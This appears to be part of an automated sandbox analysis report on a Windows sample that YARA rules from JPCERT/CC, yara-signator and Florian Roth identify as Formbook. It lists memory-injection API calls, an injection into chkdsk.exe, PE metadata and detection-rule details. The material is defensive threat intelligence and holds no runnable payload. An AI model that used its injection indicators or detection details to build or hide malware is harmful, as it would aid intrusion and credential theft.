      Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A88E2 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A08DC NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A045E EnumWindows,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8DB4 NtWriteVirtualMemory,CreateProcessInternalW,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A55EC NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A423F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4263 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4277 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A46 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33A7 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A48E8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A28E2 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4128 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A513E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A46E4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5724 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A1FD9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4C2B NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4C21 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2470 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3C4D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4C45 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7CA5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4CBE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4CB4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7488 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4CD8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4D4C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F98F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F95D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9A10 NtQuerySection,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F96D0 NtCreateKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FA710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FA770 NtOpenThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9760 NtOpenProcess,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FA3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9FE0 NtCreateMutant,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FB040 NtSuspendThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F98A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FAD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9560 NtWriteFile,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F95F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A95D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A96D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9560 NtWriteFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39D50 NtCreateFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39E80 NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39E00 NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39F30 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39DA9 NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39E7A NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39F2D NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5359
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A08DC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A045E
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8DB4
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A55EC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A423F
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4263
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4277
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A46
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8254
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A84
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2AFD
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2AD6
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A22D5
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0B2B
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0B73
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33A7
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0B9B
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33EC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A103C
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A781E
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A78B2
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A48E8
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A28E2
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4128
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3920
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8138
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A513E
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A09A8
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A19CC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2E2F
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0618
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8E7C
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A968F
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A46E4
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7EFC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8ED8
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8F40
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7FF5
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A1FD9
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2470
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3C4D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2C5C
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A84A6
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7CA5
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A348A
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7488
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A34EA
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A84E9
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3568
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0D50
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2DA0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A35B0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0584
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A25D4
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D6E30
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E482EF7
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4822AE
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E482B28
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EEBB0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47DBD2
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E481FF1
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47D466
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C841F
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471002
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E20A0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4828EC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CB090
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4820A8
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B0D20
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E481D55
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D4120
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BF900
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E482D07
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4825DD
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2581
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CD5E0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_0056968F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05531D55
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05532D07
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05460D20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055325DD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547D5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05492581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552D466
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547841F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553DFCE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05531FF1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552D616
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05486E30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05532EF7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546F900
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521002
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553E824
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055328EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B090
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055320A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AB40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05532B28
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552DBD2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055203DA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549EBB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0551FA2B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055322AE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C3D069
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C21030
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C3DA97
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C22D8D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C22D90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C29E2B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C29E30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C22FB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C3DF79
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0546B150 appears 69 times
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: String function: 1E3BB150 appears 35 times
      Source: F63V4i8eZU.exeStatic PE information: invalid certificate
      Source: F63V4i8eZU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: F63V4i8eZU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: F63V4i8eZU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: F63V4i8eZU.exe, 00000000.00000002.316213281.0000000000438000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000002.481559175.000000001E63F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000002.476842708.00000000023E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000002.476803523.0000000000AF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000000.315529096.0000000000438000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000002.475313264.00000000000D6000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exeBinary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
